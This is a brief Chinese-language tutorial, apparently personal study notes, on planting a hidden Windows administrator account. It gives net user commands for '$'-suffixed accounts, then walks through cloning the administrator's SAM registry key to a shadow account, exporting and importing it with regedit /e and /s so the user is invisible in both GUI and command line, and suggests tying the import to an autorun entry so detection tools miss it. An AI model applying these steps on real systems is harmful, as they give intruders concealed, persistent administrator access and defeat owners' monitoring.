命令框输入net user 查看计算机现有用户
创建用户 net user 用户名 密码 /add
创建隐藏账户 net user 用户名$ 密码 /add
删除用户
注册表查看用户,并创建用户
win+R 运行regedit打开注册表编辑器,找到SAM把读取勾选上,关闭后重新打开注册表编辑器
查看用户名键值
图形化界面导出admin用户和刚才创建的cc$信息
克隆权限
图形化注册表模式创建用户
删除刚才创建的cc$
刚才复制的注册表点击添加到注册表。
因为cc$文件保存出现问题,重新保存成ww$,如果无法添加到注册表,把SAM权限更改为完全控制。
这种用注册表创建的用户,图形化界面和命令行查看都看不到这个用户
命令行注册表用户导入创建
也可以直接用命令regedit /e 目录文件名 注册表 导出
regedit /e C:\test.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
用命令regedit /s 目录文件 导入
regedit /s c:\ww$.reg
也可以把上面的命令绑定到注册表运行的文件上运行自启动创建用户,waf无法发现